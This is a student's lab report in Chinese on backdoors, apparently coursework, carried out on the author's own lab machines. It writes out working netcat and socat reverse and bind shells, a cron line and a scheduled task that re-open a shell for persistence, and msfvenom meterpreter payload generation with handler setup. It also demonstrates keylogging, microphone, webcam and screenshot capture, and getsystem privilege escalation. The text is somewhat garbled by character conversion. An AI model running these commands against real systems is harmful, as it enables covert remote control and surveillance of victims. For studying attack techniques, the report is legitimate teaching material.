Exp2 後門原理與實踐 20164309

 

準備工做:

使用 ipconfig 查看win7虛擬機IP地址爲:192.168.236.130linux

使用 ipconfig 查看linux虛擬機IP地址爲:192.168.236.131web

 

 

實驗內容

 

1、使用ncnetcat遠程獲取shell

1win得到Linux shell

1windows打開監聽

進入文件夾shell

cd netcat

開始監聽windows

ncat.exe -l -p 4309

這裏的 -l 是監聽模式,-p是選擇監聽的端口。安全


2. Linux反彈鏈接win

nc 192.168.236.130 4309 -e /bin/sh

 

3.windows下得到一個linux shell,可運行任何cmd指令,如ls

2 Linux得到Win Shell

1.Linux運行監聽指令

nc -l -p 4309

2.Windows反彈鏈接Linux

ncat.exe -e cmd.exe 192.168.236.131 4309

 

3.Linux下看到Windows的命令提示

能夠發現,linux端得到了win的shelltcp

 

3 nc傳輸數據

1.win端對4309端口進行監聽

ncat.exe -l -p 4309

2.linux端鏈接到win4309端口

nc 192.168.236.130 4309

3.傳輸通道創建,能夠傳輸文字信息了

 

2、使用netcat獲取主機操做Shellcron啓動

1.在Win端進行監聽

ncat.exe -l -p 4309

 2.使用crontab指令增長一條定時任務

crontab-e

crontab指令能夠用於設置週期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab文件中,以供以後讀取和執行,"-e"表示編輯工具

3.添加指令令其定時反向鏈接

在最後添加一條定時鏈接win端口的指令學習

56 * * * * /bin/netcat 192.168.236.130 4309 -e /bin/sh

表示每小時的第56分鐘鏈接IP爲192.168.236.130的主機(即虛擬機win7端)的4309端口,具體時間能夠自行設定,我這裏爲了方便選擇了兩分鐘以後的時間網站



稍等片刻,發現成功獲取win端的shellui





3、使用socat獲取主機操做Shell, 任務計劃啓動

1.新建一個能運行socat的任務

 ①搜索任務計劃程序,點擊進入

 

②點擊右側操做裏的建立任務,並命名爲「20164309 socat

③新建觸發器,設定爲在鎖定時觸發

 

③新建操做,選定目標程序路徑,而且添加參數:

tcp-listen:4309 exec:cmd.exe,pty,stderr

這個命令能夠將cmd.exe綁定到4309端口,而且將cmd.exe的stderr重定向到stdout上

 

 咱們能夠看到,建立任務成功

2.觸發任務,使其運行

使用Windows+l鎖定主機後,再解鎖,發現程序已經運行

3.獲取shell

socat - tcp:192.168.236.130:4309

這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的4309端口。

在實現的時候我出現了一個問題:在tcp後多打了一個空格,卡了好久,不過好在成功了,你們引覺得戒。

修改後發現已經成功獲取cmd Shell

4、使用MSF meterpreter生成可執行文件,利用ncatsocat傳送到主機並運行獲取主機Shell

1.生成後門

在linux端使用msfvenom工具,生成後門:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.194 LPORT=4309 -f exe > 20164309_backdoor.exe 192.168.236.131

其中-p 使用的payload,爲有效載荷,就是被運輸有東西。這裏windows/meterpreter/reverse_tcp就是一段shellcode.LHOST是反彈回連的IP,即攻擊機linuxIP地址,LPORT是回連的端口,-f是生成文件的類型, >輸出到哪一個文件

因爲一開始沒有充分理解這裏的ip地址的意義,我使用了被攻擊win端的地址,致使在以後使用後門的時候屢屢失敗。通過理解我發現這裏的ip是被攻擊主機須要鏈接的地址,即爲攻擊機linux端的地址。

2. 使用nc進行文件傳輸

須要在win端關閉殺軟和防火牆的條件下進行

①在win端進行監聽

ncat.exe -lv 4309 > 20164309_backdoor.exe

其中-lv表示能夠觀察到鏈接狀態

 

 ②在linux端傳輸文件

nc 192.168.236.130 4309 < 20164309_backdoor.exe發送文件

在win端命令行顯示傳輸成功

的確傳輸成功了

 3.在msf端控制檯設置反彈回連

輸入

msfconsole

進入控制檯(以後因爲實驗多次失敗我進入了這個界面不知道多少次。。。幸好這裏有一個小彩蛋,每次進入的界面大都和以前不同,也算是苦中做樂了吧)

use exploit/multi/handler

設置payload

set payload windows/meterpreter/reverse_tcp

使用生成後門程序時相同的payload

set LHOST 192.168.236.131

這裏須要與生成後門程序的主機IP相同

set LPORT 4309

須要使用相同的端口

show options

顯示選項

exploit

進行監聽

多次嘗試,在糾正了剛剛說的那個錯誤後在win端運行了正確的後門


發現能夠調用win端shell

5、使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

還有不少功能可使用,咱們一個一個試試吧

1.使用screenshot進行截屏,截屏得文件nQebvnBz.jpeg

2.使用keyscan_start指令開始記錄下擊鍵的過程,亂輸一通試試:

成功記錄

3.使用record_mic指令截獲一段音頻,文件名爲qbucCKSm.wav

4.或者使用webcam_snap進行拍。。等等,爲何失敗了

發現沒法進行拍照,看看排除一下緣由,發現:

貌似虛擬機沒法調用內置攝像頭

上網查查有什麼解決的方法


???如今去買一個外置攝像頭也來不及了,忍痛割愛在本身主機上試試吧。。。

 循序漸進地進行試驗:

查得ip地址爲:192.168.6.194

傳輸後門

linux準備就緒後運行後門

發現能夠拍照了,那多拍幾張選一張看得出生理特徵的(好比眼鏡(???)),就決定是你了:hAcbeMwj,jpeg

 

5.繼續實驗嘗試提權

輸入getuid查看權限分組

輸入getsystem進行提權

發如今提權時遇到了一些問題,沒法提權

有多是win10帳號是管理員權限?那我再在win7虛擬機上嘗試一下普通用戶

仍是失敗

再試試win7的管理員帳號

意想不到的是居然成功了,但願大神們能幫忙解釋一下原理


 

基礎問題解答:

(1)   例舉你能想到的一個後門進入到你係統中的可能方式?

記得好久之前的三一五晚會曝光了一些手機APP擅自添加後門,致使巨大的財產損失的案例,那時候智能手機方興未艾,人們的安全意識也相對薄弱,可是如今這樣的事情還真實地發生在咱們身邊;還有一些釣魚網站會誘導咱們點擊下載一些後門程序,一旦程序運行就成了人爲刀俎我爲魚肉的情形了。

(2)   例舉你知道的後門如何啓動起來(winlinux)的方式?

後門可能會假裝成正常的程序或軟件,誘導用戶使用,來獲取你的權限。

(3)   Meterpreter有哪些給你映像深入的功能?

遠程拍照功能。在以前bm管理概論的課程中我閱讀了《無處可藏》這本書,有一段令我印象深入的細節是斯諾登筆記本電腦的攝像頭用膠帶封住了,當時我還認爲杞人憂天了,可是沒有想到這種技術門檻這麼低。

(4)如何發現本身有系統有沒有被安裝後門?

對於咱們來講最好的辦法就是常常性的殺毒、及時更新系統、病毒庫以查找後門。在實驗中我還發如今進行遠程照相的時候我攝像頭旁邊的呼吸燈閃了一下,若是現實生活中遇到這種狀況務必要注意了

 

實驗心得:

此次實驗最大的收穫就是明白了細節決定成敗。因爲本身的粗心馬虎,此次實驗幾乎花了我兩個晚上才完成,每一步都要遇到一些或多或少地小問題。甚至一開始爲了避免註冊碼雲帳號沒有使用老師的ncet而去網上下載了一個,致使在傳輸文件的時候出現問題;還有輸入socat命令的時候多打了一個空格,也致使沒法順利調用shell;甚至在寫實驗報告的時候發現缺乏關鍵的截圖而回過頭來臨時作臨時截的。在從此的實驗和學習乃至工做中,我必定要戒驕戒躁,時刻關注細節,才能高質量地完成任務。

相關文章
相關標籤/搜索